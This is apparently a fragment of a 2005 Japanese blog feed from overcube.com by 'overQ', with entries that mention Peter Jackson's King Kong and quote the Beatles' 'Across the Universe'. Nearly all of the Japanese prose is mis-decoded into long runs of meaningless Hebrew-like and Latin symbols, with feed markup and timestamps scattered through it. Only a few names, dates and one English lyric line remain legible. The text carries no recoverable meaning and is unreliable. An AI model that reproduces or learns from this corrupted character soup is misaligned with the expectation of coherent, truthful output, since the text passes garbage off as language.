    -₪ַ₪ג¡¢¡ײ₪ט₪ך₪ט₪₪¼ׂ²ס¡׳₪ָ₪₪₪¦₪ט₪¦₪₪ג₪־₪־¾ל¹ח¡¢´°את₪µ₪¬£±£°£°¥ׁ¡¼¥»¥ף¥ָ₪ֻ₪₪כ₪³₪ָ₪ֱֱֿ₪ַ₪­₪₪₪¡£
    -£¹£¹¥ׁ¡¼¥»¥ף¥ָ₪¬¡¢£¹£¹¡¥£¹¥ׁ¡¼¥»¥ף¥ָ₪ֻ₪₪ך¡¢£¹£¹¡¥£¹£¹¥ׁ¡¼¥»¥ף¥ָ₪ֻ₪₪ך¡ִ₪ָ¡¢¶בֻµ₪ֻ₪ֿ¶ב₪ֵ₪¯₪±₪ֹ¡¢´°ֱ´₪½₪־₪ג₪־₪ֻ₪₪כ₪³₪ָ₪ֿ¡¢₪±₪ֳ₪·₪ֶ₪₪₪¡£
    -₪¹₪ם₪ָ¡¢´°את₪µ₪עּ»״₪»₪׀ּ»״₪¹₪₪ֹ¡¢¡ײֹװµ₪ּ£₪־ֳ«¡׳₪ּֿµ¸ֲ₪ֻֽמ₪ֱ¹‏₪א²ִַ½ְ­₪¬₪¢₪כ¡ִ₪־₪«₪ג₪·₪ל₪₪»₪ף((¡¨§¥)

    ]]> -
    -
    - - ֹװµ₪ּ£₪־ֳ« - - 2005-12-28T14:25:11Z - 2005-12-28T23:25:11+09:00 - tag:www.overcube.com,2005:/blog//2.675 - 2005-12-28T14:25:11Z - ¥װ¡¼¥¿¡¼¡¦¥¸¥ד¥¯¥½¥ף´ִֶֶ₪־¡ײ¥­¥ף¥°¥³¥ף¥°¡׳¡£ ¥ם¡¼¥ֹ¡¦¥×¥ײ¡¦¥¶¡¦¥ך¥ף¥°¡׳₪ֻ₪ִ₪ֵ₪₪₪ֶ¡¢÷£²ף₪ג£ֳ£ַ₪¬₪¹₪´₪½₪¦¡£ ₪ֹ₪ף₪ֹ₪ף¿²½₪¹₪כ£ֳ£ַ¡ִ₪ַ₪¹₪¬¡¢ַ÷₪₪ג₪¢₪כ₪־₪ְ₪ָ₪«¡£ ֹװµ₪ּ£₪־ֳ«¸½¾¡¢₪ָ¸ֶ₪׀₪ל₪כ₪ג₪־¡£ ₪¿₪ָ₪¨₪׀¿ֽ´ײ₪ע£ֳ£ַ₪ֱַֹ₪¯¾ל¹ח¡¢¥ך¥¢¥כ₪ֻ₪₪ל₪׀₪₪כ₪₪ֹ¡¢₪₪ֻ₪«ֹװµ₪ּ£₪µ₪¬₪ֻ₪¸₪½׀₪ֶ₪¯₪כ¡£ ֳ±½ד₪ְ‏²ט₪ֱַֹ₪₪₪ֶ₪₪₪¿»‏₪ֿ¡¢₪«₪ן₪₪₪¯¥ַ¥ױ¥©¥כ¥ב₪µ₪ל₪¿¥­¥ד¥י¥¯¥¿¡¼₪ְ₪ֳ₪¿₪־₪ֻ¡¢¥ך¥¢¥כ₪¿ֽ´ײ₪ֻ¶ב₪ֵ₪¯₪ֻ₪ִ₪ל₪ֶ¡¢₪₪ף₪ְ₪«¥¾¥ף¥׃₪₪¿₪₪₪ֹװµ₪ּ£₪¼ֱ´¶₪¬₪¿₪ְ₪ט₪ֳ₪ֶ₪¯₪כ¡£ ¥ם¥¥ֳ¥ָ¹©³״₪ַ₪ֿ°ֱ°₪«₪יֳ־₪י₪ל₪כ¸½¾₪ַ¡¢ֵל¹©ֲח₪־¿¹ְ¯¹°ַמ»־₪¬1970ַ¯₪ְֻֿ¸₪עָ¯ֹ½¡£ ¿ֶ₪·₪₪ה₪¹₪µ₪ע½ִ¼´¡¢¥ך¥¢¥כ₪µ₪ע²£¼´₪ֻ¥°¥י¥ױ₪ע½ס₪¯₪ָ¡¢¥ך¥¢¥כ₪µ₪¬ֱ‎₪¹₪ֻ₪ִ₪ל₪ֶ¡¢ֵ׃ֳז₪₪ַ₪ֿ¿ֶ₪·₪₪¬ֱ‎₪¹₪־₪ְ₪±₪ל₪ֹ¡¢₪¢₪כ¥¥₪¥ף¥ָ₪ַ¥¬¥¯¥ף₪ָ¿ֶ₪·₪₪ה₪¹₪µ₪¬ֽמ₪ֱ¹‏₪א¡ײֳ«¡׳₪¬₪ַ₪­₪כ¡¢₪ָ₪₪₪¦₪ג₪־¡£ ₪₪¼₪³₪ף₪¸½¾₪¬µ¯₪­₪כ₪«¡£ ¡ײ¾נף₪־¾¯₪₪₪³¨¡׳₪ְ₪ָ¡¢¿ֽ´ײ₪־ּ₪ֿ¡¢ֹװֲ­₪·₪ֶ₪₪₪כ¾נף₪עה₪¦¡£¹¥°ױֵ×₪ֻה´°₪¹₪כ·¹¸‏₪¬₪¢₪כ¡£₪₪־₪«₪¥ז¡¼¥ָ¥װ¥¢₪עּ´¸«₪כ₪ף₪ַ₪·₪ח₪¦₪«¡£ ₪ַ₪ג¡¢¾נף־ּ₪¬¡ײ´°ֱ´¡׳₪ֻ¶ב₪ֵ₪₪₪ֶ₪¯₪כ₪ֻ₪ִ₪ל¡¢÷£ֵ₪ֿµױ₪ֻ¡ײ·ח₪±₪ֶ₪₪₪כֹפ¬¡׳₪ֻּ₪¬₪₪₪¯₪ט₪¦₪ֻ₪₪ֳ₪ֶ₪·₪₪¦¡£¥¢¥י₪¬ּ־©₪ִ¡ִ₪ָ₪₪₪¦₪³₪ָ₪י₪·₪₪₪־₪ַ₪¹¡£ £ֳ£ַ₪¬ָ¯ֳ£₪·¡¢¥²¡¼¥א¶ָ³¦₪¬₪³₪־¸½¾₪ַֻ÷₪₪µ₪ל₪ֶ₪₪₪כ¡¢₪ָ₪₪₪¦ֳֿ¡£ ÷ַ¶ב₪ֱ₪ח₪ֳ₪ֲֳָֿך₪ֻ₪₪ֳ₪ֶ₪כ₪ף₪ְ₪ָ₪«¡£ ¡תֲ³₪­₪עֻ÷₪ל₪כ ₪ַ¡¢₪³₪³₪₪ַ½ס₪₪₪ֶ¡¢µ·ֶ₪ע₪ָ₪ֳ₪¿¡£ֲ³₪­₪ֿ₪¢₪ָ₪ַ¡¢₪ָ»׳₪ֳ₪ֶ₪₪₪¿₪־₪ְ₪±₪ל₪ֹ¡¢₪µ₪ֶ²¿₪ע½ס₪¯₪ִ₪ג₪ך₪ְ₪ֳ₪¿₪«¡¢ֻ÷₪ל₪₪·₪¿(¡¨¡¦¢ֿ¡¦) ₪₪ף₪«₪ֽ¡¢÷ַ¶ב₪־½׀ֽט»צ₪ָ₪«־®¹װ₪ָ₪«₪₪₪ֳ₪¿₪³₪ָ₪ַ¡¢₪³₪־¡ײֹװµ₪ּ£₪־ֳ«¡׳¸½¾₪ָ₪ט₪¯»ק₪¿₪־₪¬₪¢₪כ₪ָ»״ֵ¦₪·₪ט₪¦₪ָ₪·₪ֶ₪¿₪ף₪ְ₪ָ»׳₪¦₪ף₪ַ₪¹₪¬¡£₪¦¡¼₪ף¡¢²¿₪ְ₪ֳ₪¿₪«¡ִ»׳₪₪₪ְ₪»₪ף¡£... - - overQ - - - - mystery - - PETER JACSON'S ¥­¥ף¥°¡¦¥³¥ף¥° ¥×¥ױ¥£¥·¥ד¥כ ¥²¡¼¥א ¥×¥ײ ¥¶ ¥א¡¼¥׃¡¼¥װ¡¼¥¿¡¼¡¦¥¸¥ד¥¯¥½¥ף´ִֶֶ₪־¡ײ¥­¥ף¥°¥³¥ף¥°¡׳¡£
    -¥ם¡¼¥ֹ¡¦¥×¥ײ¡¦¥¶¡¦¥ך¥ף¥°¡׳₪ֻ₪ִ₪ֵ₪₪₪ֶ¡¢÷£²ף₪ג£ֳ£ַ₪¬₪¹₪´₪½₪¦¡£

    - -

    ₪ֹ₪ף₪ֹ₪ף¿²½₪¹₪כ£ֳ£ַ¡ִ₪ַ₪¹₪¬¡¢ַ÷₪₪ג₪¢₪כ₪־₪ְ₪ָ₪«¡£

    - -

    ֹװµ₪ּ£₪־ֳ«¸½¾¡¢₪ָ¸ֶ₪׀₪ל₪כ₪ג₪־¡£

    - -

    ₪¿₪ָ₪¨₪׀¿ֽ´ײ₪ע£ֳ£ַ₪ֱַֹ₪¯¾ל¹ח¡¢¥ך¥¢¥כ₪ֻ₪₪ל₪׀₪₪כ₪₪ֹ¡¢₪₪ֻ₪«ֹװµ₪ּ£₪µ₪¬₪ֻ₪¸₪½׀₪ֶ₪¯₪כ¡£
    -ֳ±½ד₪ְ‏²ט₪ֱַֹ₪₪₪ֶ₪₪₪¿»‏₪ֿ¡¢₪«₪ן₪₪₪¯¥ַ¥ױ¥©¥כ¥ב₪µ₪ל₪¿¥­¥ד¥י¥¯¥¿¡¼₪ְ₪ֳ₪¿₪־₪ֻ¡¢¥ך¥¢¥כ₪¿ֽ´ײ₪ֻ¶ב₪ֵ₪¯₪ֻ₪ִ₪ל₪ֶ¡¢₪₪ף₪ְ₪«¥¾¥ף¥׃₪₪¿₪₪₪ֹװµ₪ּ£₪¼ֱ´¶₪¬₪¿₪ְ₪ט₪ֳ₪ֶ₪¯₪כ¡£

    - -

    ¥ם¥¥ֳ¥ָ¹©³״₪ַ₪ֿ°ֱ°₪«₪יֳ־₪י₪ל₪כ¸½¾₪ַ¡¢ֵל¹©ֲח₪־¿¹ְ¯¹°ַמ»־₪¬1970ַ¯₪ְֻֿ¸₪עָ¯ֹ½¡£
    -¿ֶ₪·₪₪ה₪¹₪µ₪ע½ִ¼´¡¢¥ך¥¢¥כ₪µ₪ע²£¼´₪ֻ¥°¥י¥ױ₪ע½ס₪¯₪ָ¡¢¥ך¥¢¥כ₪µ₪¬ֱ‎₪¹₪ֻ₪ִ₪ל₪ֶ¡¢ֵ׃ֳז₪₪ַ₪ֿ¿ֶ₪·₪₪¬ֱ‎₪¹₪־₪ְ₪±₪ל₪ֹ¡¢₪¢₪כ¥¥₪¥ף¥ָ₪ַ¥¬¥¯¥ף₪ָ¿ֶ₪·₪₪ה₪¹₪µ₪¬ֽמ₪ֱ¹‏₪א¡ײֳ«¡׳₪¬₪ַ₪­₪כ¡¢₪ָ₪₪₪¦₪ג₪־¡£

    - -

    ₪₪¼₪³₪ף₪¸½¾₪¬µ¯₪­₪כ₪«¡£

    - -

    ¡ײ¾נף₪־¾¯₪₪₪³¨¡׳₪ְ₪ָ¡¢¿ֽ´ײ₪־ּ₪ֿ¡¢ֹװֲ­₪·₪ֶ₪₪₪כ¾נף₪עה₪¦¡£¹¥°ױֵ×₪ֻה´°₪¹₪כ·¹¸‏₪¬₪¢₪כ¡£₪₪־₪«₪¥ז¡¼¥ָ¥װ¥¢₪עּ´¸«₪כ₪ף₪ַ₪·₪ח₪¦₪«¡£
    -₪ַ₪ג¡¢¾נף־ּ₪¬¡ײ´°ֱ´¡׳₪ֻ¶ב₪ֵ₪₪₪ֶ₪¯₪כ₪ֻ₪ִ₪ל¡¢÷£ֵ₪ֿµױ₪ֻ¡ײ·ח₪±₪ֶ₪₪₪כֹפ¬¡׳₪ֻּ₪¬₪₪₪¯₪ט₪¦₪ֻ₪₪ֳ₪ֶ₪·₪₪¦¡£¥¢¥י₪¬ּ־©₪ִ¡ִ₪ָ₪₪₪¦₪³₪ָ₪י₪·₪₪₪־₪ַ₪¹¡£

    - -

    £ֳ£ַ₪¬ָ¯ֳ£₪·¡¢¥²¡¼¥א¶ָ³¦₪¬₪³₪־¸½¾₪ַֻ÷₪₪µ₪ל₪ֶ₪₪₪כ¡¢₪ָ₪₪₪¦ֳֿ¡£
    -÷ַ¶ב₪ֱ₪ח₪ֳ₪ֲֳָֿך₪ֻ₪₪ֳ₪ֶ₪כ₪ף₪ְ₪ָ₪«¡£

    - -

    ¡תֲ³₪­₪עֻ÷₪ל₪כ

    - -

    ₪ַ¡¢₪³₪³₪₪ַ½ס₪₪₪ֶ¡¢µ·ֶ₪ע₪ָ₪ֳ₪¿¡£ֲ³₪­₪ֿ₪¢₪ָ₪ַ¡¢₪ָ»׳₪ֳ₪ֶ₪₪₪¿₪־₪ְ₪±₪ל₪ֹ¡¢₪µ₪ֶ²¿₪ע½ס₪¯₪ִ₪ג₪ך₪ְ₪ֳ₪¿₪«¡¢ֻ÷₪ל₪₪·₪¿(¡¨¡¦¢ֿ¡¦)
    -₪₪ף₪«₪ֽ¡¢÷ַ¶ב₪־½׀ֽט»צ₪ָ₪«־®¹װ₪ָ₪«₪₪₪ֳ₪¿₪³₪ָ₪ַ¡¢₪³₪־¡ײֹװµ₪ּ£₪־ֳ«¡׳¸½¾₪ָ₪ט₪¯»ק₪¿₪־₪¬₪¢₪כ₪ָ»״ֵ¦₪·₪ט₪¦₪ָ₪·₪ֶ₪¿₪ף₪ְ₪ָ»׳₪¦₪ף₪ַ₪¹₪¬¡£₪¦¡¼₪ף¡¢²¿₪ְ₪ֳ₪¿₪«¡ִ»׳₪₪₪ְ₪»₪ף¡£
    -

    ]]> - ²¿₪ְ₪ֳ₪¿₪־₪«₪₪¢¡£¡ִ¾®ְפְ¯¸¢₪ָ₪«₪ְ₪ֳ₪¿₪־₪«¡£
    -₪¢₪₪ך₪ֻ¥·¥ם¥¦¥ָ₪ֳ₪₪₪₪־₪ַ¡¢ֹװֲ­₪·₪ֶ₪₪₪כ₪ג₪־₪ע¹סּ±₪¬¶ץֱ₪ַ¹¥°ױֵ×₪ֻה´°₪¹₪כ₪·₪«₪₪¯₪ֶ¡¢»»‎־¨₪¬¹ג₪₪₪ָ₪«¡£
    -¡ִ₪₪₪ה₪¢¡¢₪½₪ף₪ֹק»ֹּ¡²ט₪₪¿₪₪₪ֳֿ₪ַ₪ֿ₪₪«₪ֳ₪¿µ₪₪¬₪¹₪כ₪₪¡¡£₪ג₪ֳ₪ָ¥װ¥ֳ¥¿¥ך₪ָ¡ײֹװµ₪ּ£₪־ֳ«¡׳¸½¾₪ָ½ֵ₪₪כ₪³₪ָ₪ְ₪ֳ₪¿₪ֿ₪÷₪₪ף₪ְ₪¬¡£

    - -

    »׀»ץ¡ִ₪ֿ´״·¸₪₪₪₪ט₪₪¢¡£´¨ַָ₪ג₪₪ֳ₪¿₪¯´״·¸₪₪µ₪½₪¦₪ְ₪·¡£ִ»¥₪¥ף¥ױ¥כ¥¨¥ף¥¶₪ג₪ֱ₪¬₪¦¡££ָ£ַ₪ֿ¡ִ₪«₪¹₪ך₪ג₪·₪ֶ₪₪₪¡£¥₪¥ף¥ך¥ף₪µ₪₪ֿ°תֲא₪¹₪כ₪־₪«₪₪¡¡£

    - -

    ¡ת´׳ֳֿµֲך

    - -

    ₪ָ₪₪₪¦₪ן₪±₪ַ¡¢ֲ³₪­₪עֻ÷₪ל₪¿₪־₪ַ¡¢ּ₪ֳֿ₪ֻ¡£´׳ֳֿµֲך¡ִ₪ָ₪₪₪¦₪«¡¢₪¹₪ַ₪ֻ₪³₪³₪₪ַ₪¬´׳ֳֿ₪־₪ט₪¦₪¾ץֲײ₪ַ₪¹₪¬¡£

    - -

    ּ₪ֳֿ₪·₪ֽ₪§¡£µ₪ֻ₪₪₪ן₪ל₪ֶ₪ג₪₪¢¡£»׳₪₪₪ִ₪¯₪ג₪־₪¬¡ִ¡£

    - -

    ¥×¥ף¥י¥₪¥ף½סֵ¹¥׃¡¼¥±¡¼¥ן¥ף¡§¿´ֽ‎»מ¸³

    - -

    ₪½₪¦¡£¡ײ»׳₪₪₪ִ₪¯¡׳₪ָ₪₪₪¨₪׀¡¢ֽנג₪ֻ¡ײ¿´ֽ‎»מ¸³¡׳₪ָ₪₪₪¦ֳ»׃₪¬₪¢₪ֳ₪ֶ¡¢ְ÷¿ְ¬ְֿ₪ַ»ָ₪¦¼«ֽ³ֿ¢ֱ¥ֶ¥¹¥ָ₪־ֳֿ₪¬½׀₪ֶ₪¯₪כ¡£
    -¥י¥ף¥ְ¥א₪ֱֻ×₪ף₪ְֳ±¸ל₪ע¼¡¡¹₪ֶָֹ₪¾ו₪²₪ֶ¡¢₪½₪³₪«₪יֿ¢ֱ₪¹₪כֳ±¸ל₪עָן¸³¼װ₪ֵֻת₪¨₪µ₪»₪ֶ₪₪₪¯₪ָ₪₪₪¦₪ג₪־¡£
    -¹ֽ₪¨₪ֵֶת₪¨₪כ₪־₪¸₪ד₪₪¯₪ֶ¡¢¥ׁ¥ֳ¥ׁ¥ֳ¥ׁ₪ָָ¿¼ֵֽ×₪ֻ»׳₪₪₪ִ₪¯¸ל₪עֵת₪¨₪ֶ₪₪₪¯₪־₪ַ¡¢°ױ¼±₪־ֶ¯₪¯·ה₪¬₪₪¯¡¢ּµ°ױ¼±ֵ×₪ָ½ֳַ₪¬₪₪µ₪ל₪כ¡¢₪ָ₪₪₪¦₪³₪ָ¡ִ₪ְ₪ֳ₪¿µ₪₪¬₪·₪₪¹¡£
    -°ֽֽ₪ֿ¢ֱ₪ָ₪«¡¢₪¢₪כ₪₪₪ֿֿ¢ֱ₪¹₪כ₪₪ַ₪־»‏´ײ₪₪ֹ₪ג·׳ֲ¬₪·₪ֶ¡₪³₪־»‏´ײ₪¬ֽנג÷מֹ₪ַ₪ֿ¸°₪ֻ₪₪ֳ₪ֶ₪כ¡ֻ¡¢₪₪₪ם₪₪₪ם¬ְֿ₪¹₪כ₪י₪·₪₪¡£

    - -

    ₪ַ₪ג¡¢₪³₪¦₪·₪¿ָ¿¼ֵֽ×₪ֿ¢ֱ₪ֳ₪ֶ¡¢₪ױ₪ִ₪¦₪ֻ₪³₪¦₪·₪ֶ₪ג₪־₪ע½ס₪₪₪¿₪ך¡¢¿ֽ₪ֳָֿ₪·₪¿₪ך₪¹₪כ»‏₪ֻ₪ג¡¢ֶ±₪¸₪ט₪¦₪ֶֻ¯₪₪₪ֶ₪₪₪₪₪₪ְ₪ם₪¦₪«₪ָ¡¢₪ױ₪ָ»׳₪ֳ₪¿₪³₪ָ₪¬₪¢₪ך₪₪¹¡£

    - -

    Words are flowing out like endless rain into a paper cup...

    - -

    ¥׃¡¼¥ָ¥כ¥÷₪־ Across the Universe ₪¸₪ד₪₪₪₪±₪ֹ¡¢ל¹ס¸ל₪ֳַֿ₪¹₪«₪®₪ך¡¢¸ְֽױ₪ֿ¼¡¡¹₪ָ¼«ֱ³₪ֹֻג₪«₪ף₪ַ₪¯₪כ₪·¡¢²¿₪־µ₪₪₪·₪ֻ₪ֹ₪ף₪ֹ₪ף₪·₪ד₪₪כ₪³₪ָ₪¬½׀ֽט₪כ¡£
    -ּµ°ױ¼±₪ַ₪ֹ₪ף₪ֹ₪ף₪·₪ד₪₪ֳ₪ֶ₪₪₪כ¡£¡ײ־®ִ×₪ֻ¡׳₪ָ₪₪₪¦ֹ½¸½₪־₪ָ₪×₪ך¡¢־®₪ל₪כ₪ט₪¦₪ֻ¡¢₪½₪·₪ִֶ×µ₪₪־¡ײ₪־₪ף¡׳₪ַ₪־₪ף₪₪ף₪ְ₪י₪ך₪ָ¡¢₪₪ֻ₪ע°ױ¼±₪¹₪כ₪ַ₪ג₪₪¯¡¢₪ֹ₪ף₪ֹ₪ףֳֿ₪¹¡£

    - -

    ₪¸₪ד₪¢¡¢¸ְֽױ₪ֳ₪ֶּµ°ױ¼±₪₪־₪«₪¡£
    -₪ַ₪ג¡¢°ױ¼±₪ָ₪ֿ¸ְֽױ₪־₪³₪ָ₪ְ₪ָ¡¢₪ױ₪ִ₪¦₪₪ף₪ָ₪₪¯¿®₪¸₪ֶ₪כ₪ט₪¦₪ֻ₪ג»׳₪¦¡£₪₪µ₪ֻ¡¢₪³₪־¿´₪־ֳז₪ַ¼¡¡¹»׳₪₪ֹג₪«₪₪כ¸ְֽױ₪¬¡¢¹ֽ₪¨₪כ₪ָ₪₪₪¦₪³₪ָ₪ְ₪·¡¢°ױ¼±₪־¼ֲֲ־₪ַ₪¢₪כ₪ָ¡£
    -÷£₪³₪¦₪·₪ֶ½ס₪­₪ִ₪±₪ֶ₪כ¸ְֽױ₪ג₪½₪־₪ט₪¦₪₪ג₪־₪־₪ֿ₪÷₪₪ף₪ַ₪¹₪¬¡¢₪½₪ל₪ֿ°ױ¼±₪ָ₪ּֿ₪²¿₪«₪¬ָ¯ֳֿ₪·₪ֶ₪₪₪כ₪־₪«¡£°ױ¼±₪ֿ₪½₪ל₪עֻµ₪י₪ַּµ־ֿ₪ֻעֱ³₪ָ¸«₪ִ₪ב₪כ₪ְ₪±₪ַ¡£₪ֹ₪¦₪₪ֳ₪ֶ₪כ₪־₪«¡£

    - -

    ¸ְֽױ₪ּֿµ°ױ¼±₪«₪י₪ֹ₪ף₪ֹ₪ף־®½׀₪·₪ֶ¡¢°ױ¼±₪ֿ₪¸₪ִ₪ֿ¡¢₪¿₪ף₪ֻ₪½₪ל₪עִֹ₪ֳ₪«₪±₪ֶ₪כ₪ְ₪±₪ְ₪ָ₪¹₪ל₪׀¡£
    -ִֹ₪₪₪«₪±₪ֶ¡¢₪¢₪ָ₪ֻ₪₪ֳ₪ֶ₪«₪י¡¢₪¢₪¿₪«₪ג₪½₪ל₪ע¼«¬₪ַֹ½¸½₪·₪¿₪«₪־₪ט₪¦₪ֻ÷¾¾־₪·₪ֶ¡¢¼«¬₪־¼ךֱ₪־₪ט₪¦₪ֻ¡¢¼«¬₪־¼ֲֲ־₪־₪ט₪¦₪ֻ»׳₪₪₪₪·₪ֶ₪₪₪כ¡¢₪ָ₪₪₪¦₪ט₪¦₪₪³₪ָ₪«₪·₪ל₪₪₪¡£

    - -

    ֳֿ₪·₪¿₪ך½ס₪₪₪¿₪ך¡¢¼«¬₪ַֹ½¸½₪¹₪כ»‏₪ְ₪±₪ַ₪ֿ₪₪¯₪ֶ¡¢ֶֹ₪א»‏₪ֿ¡¢₪ג₪ֳ₪ָ¼«ֽ³ֿ¢ֱֵ×₪ַ₪ֿ₪₪₪₪ְ₪ם₪¦₪«¡£
    -ֶֹ₪א¡ִֶֹ₪ב₪כ¡¢₪ָ₪₪₪¦₪³₪ָ₪ֿ¡¢ֶֹ₪ף₪ַ₪כ¸ְֽױ₪ָ₪«¥₪¥ב¡¼¥¸₪«₪י¡¢ּװ־ץ₪ֻ₪₪₪ם₪ף₪₪³₪ָ₪עֿ¢ֱ₪·₪ֶ₪₪₪כ¡£₪·₪₪¯₪ֳ₪ֶ₪₪₪כ¡£
    -₪½₪־¾µע₪ֻ¡¢ּ₪ֳ־₪־³°¹ס¸ל₪ַ½ס₪«₪ל₪¿¸¾ֿ₪ֿ¡¢ֶֹ₪ב₪₪₪¡£
    -₪₪ֻ₪ע₪ֹ₪¦ֿ¢ֱ₪·₪¿₪י₪₪₪₪₪«₪ן₪«₪י₪₪₪₪«₪י¡£¼«ֽ³ֿ¢ֱ₪¬ֶ¯₪«₪₪₪¡£

    - -

    ֳ־₪ֳ₪ֶ₪כ¸ְֽױ₪ַ½ס₪«₪ל₪¿₪ג₪־₪עֶֹ₪ף₪ַ₪כ»‏₪ֿ¡¢₪ָ₪ב₪ֹ₪₪₪ֿ¢ֱ₪¬ֽ¯₪­½׀₪ֶ¡¢¶מ₪±₪ב₪°₪ֳ₪ֶ₪כ₪ן₪±₪ַ₪¹₪¬¡¢₪½₪־₪ָ₪­²¿₪ע₪ֹ₪¦ֿ¢ֱ₪·₪ֶ₪₪₪כ₪«₪ע¡¢₪ֿ₪ֳ₪­₪ך₪ָ₪ֿ¼¨₪¹₪³₪ָ₪ֿ₪ַ₪­₪₪₪¡£ֿ¢ֱ₪ֿ₪₪ָ₪ף₪ֹ¥׀¥ֳ¥¯¥°¥י¥¦¥ף¥ֹ₪ַ½טֽ‎₪µ₪ל₪ֶ₪₪₪כ₪ט₪¦₪ֻ´¶₪¸₪כ¡£
    -₪½₪ל₪ֿ₪ג₪¦₪½₪³₪ֿ₪«₪ָ₪₪¯¡¢¡ײ־®ִס׳₪ֻֿ¢ֱ₪־ֲש־®₪ֻ²¡₪·־®₪µ₪ל₪ֶ₪₪₪כ¡£
    -₪ִ₪₪ך¡¢ֶֹ₪ף₪ַ₪₪₪כ¼חֲ־₪ֿ¡¢°ױ¼±₪ַ₪ֿ₪₪¯¡¢ּµ°ױ¼±₪ַ₪ֿ₪₪«₪ֳ₪¿₪«¡£

    - -

    ¡ִ₪ָ₪₪₪¦₪ט₪¦₪₪³₪ָ₪ע¡¢₪ױ₪ָ»׳₪ֳ₪¿₪ך₪ג₪·₪¿₪ט¡¢₪ָ₪₪₪¦´׳ֳֿµֲך₪ַ₪·₪¿¡£₪₪¢¡¢₪ְ₪₪₪ײ₪¦₪µ₪ף₪¯₪µ₪₪ְג₪₪ף₪ַ₪¹₪¬¡¢₪ָ₪ֳ₪ֶ₪ִ₪±₪¿ֳֿ₪ָ₪₪₪¦₪³₪ָ₪ַ¡£

    - -

    ₪½₪ל₪ֻ₪·₪ֶ₪ג¡¢²¿₪¬¡ײֹװµ₪ּ£₪־ֳ«¡׳₪ֻ»ק₪ֶ₪כ₪ף₪ְ₪ם₪¦¡£µ₪₪ֻ₪₪כ₪₪¢¡£

    - -

    ¡ת¸ְֽױ₪־ֳֿ₪עֲ³₪±₪כ

    - -

    ¡ײֹװµ₪ּ£₪־ֳ«¡׳₪ֿ»׳₪₪½׀₪»₪₪₪₪־₪ַ¡¢₪ג₪¦₪ֱ₪ח₪ֳ₪ָ¸ְֽױ₪־ֽ¿ְֲֳֿ₪ע₪¦₪ְ₪¦₪ְֲ³₪±₪כ₪ָ¡ִ¡£

    - -

    ל¹ס¸ל₪ְ₪ָ¡¢¼«ֽ³ֿ¢ֱ₪ֳ₪₪¯¡¢₪ֹ₪ף₪ֹ₪ף¸ְֽױ₪¬₪ִ₪₪₪ֶ½׀₪ֶ₪¯₪כ₪±₪ֹ¡¢₪³₪ל₪¬¶¯ֳז₪־³°¹ס¸ל₪ָ₪₪כ₪ָ¡¢ֱ´ֱ³₪½₪¦₪₪₪¦₪ן₪±₪ֻ₪ֿ₪₪₪«₪₪₪(¾׀)
    -³׀₪¨₪¿₪ֶ₪־³°¹ס¸ל₪ְ₪ָ¡¢»ָ₪¦»‏¡¢₪½₪ל₪¬₪ֹ₪־¥ֶ¥­¥¹¥ָ₪־₪ֹ₪³₪ֻ½׀₪ֶ₪­₪¿ֹ½¸½₪«¡¢±ַ²ט₪־₪ֹ₪־¥·¡¼¥ף₪ֳַ¯₪¬₪·₪ד₪₪ֳ₪ֶ₪¿¸ְ₪₪²ף₪·₪«¡¢₪ֿ₪ֳ₪­₪ך°ױ¼±₪·₪₪¬₪יֳֿ₪·₪₪¹¡£
    -₪ִ₪₪ך¡¢»ָ₪ֳ₪ֶ₪כ¸ְֽױ₪ֿ¡¢ֲ¾¿ֽ₪־¸ְֽױ₪ַ¡¢₪½₪ל₪ע¡ײֲ¾¿ֽ₪־¸ְֽױ¡׳₪ָ¼«³׀₪¹₪כ°ױ¼±₪¬₪¢₪כ¡£₪½₪·₪ֶ¡¢₪³₪־¾ל¹ח¡¢ּµ°ױ¼±₪ֿ₪ֹ₪³₪ֻ₪ג₪₪₪¡£

    - -

    ₪¿₪ײ₪ף¡¢־®ִ×₪ל¹ס¸ל₪ג¡¢÷ַ½י₪־÷ַ½י₪ֿ₪½₪¦₪ְ₪ֳ₪¿₪ף₪ַ₪·₪ח₪¦¡£₪ַ₪ג¡¢₪¢₪₪ך₪ֻ¥ַ¡¼¥¿¥¡¼¥¹₪¬ָמֲח²½₪·₪ֶ₪₪₪כ₪־₪ַ¡¢₪ג₪¦₪₪₪ֱ₪₪₪ֱ₪ֹ₪³₪ֳַ¯₪¬»ָ₪ֳ₪ֶ₪¿ֹ½¸½₪ְ₪ֳ₪¿₪«₪ן₪«₪י₪ף₪ט₪¦₪ֻ₪₪ֳ₪ֶ₪כ¡£½׀½ך₪ֿ¼÷₪ן₪ל¡¢ֵנ÷מ₪·ׁקְא₪·ֳר÷מ¸¢₪ע¿¯³²₪·₪₪¬₪י¡¢ּװ־ץ₪°תֽׁ₪־ֽע₪־ֳז₪ַ¡ײ־®ִס׳₪ֶֹֻ₪½ס₪­ֳֿ₪¹₪³₪ָ₪¬₪ַ₪­₪כ¡£
    -ּµ°ױ¼±₪ָ₪ֿ¡¢₪₪₪ן₪׀ָמֲח²½₪·₪ֶ¡¢»²¾ָµ¡ַ½₪¬ֹװֱ´₪ֻ₪₪ֳ₪¿µנֲח¥ַ¡¼¥¿¥¡¼¥¹¡£¥ַ¡¼¥¿¥¡¼¥¹₪ְֿ°ֽ‎₪ָ₪₪₪¦₪«¾נף°µ½ּ₪ָ₪₪₪¦₪«¡¢¾¡¼ך₪ֿ¢ֽםּײ₪ע₪ֹ₪ף₪ֹ₪ף¹­₪²₪ֶ₪₪₪ֶ¡¢°ױ¼±₪־²נ÷₪₪·₪ֻ₪₪₪ם₪ף₪ֲּֿ©¡¦ֳֿ²¼ֶ»¡¦¶בֶ»¡¦₪₪ן₪ךֶ»₪עְ¸₪½׀₪·ֲ³₪±₪כ¡£

    - -

    ¡ִ₪ָ¡¢₪ֹ₪ף₪ֹ₪ף¾¡¼ך₪ֻ¸ױ»¶½­₪₪ְג₪ע־©₪ֶ₪ֶ₪₪₪כ₪ן₪±₪ַ₪¹₪¬¡¢₪ױ₪ָ¥­¡¼¥¡¼¥ֹ₪עֳ¡₪¯¼ך₪עµ₪ב₪ֶ¡¢ֹפ²°₪ע¸«ֵֿ₪¹¡£
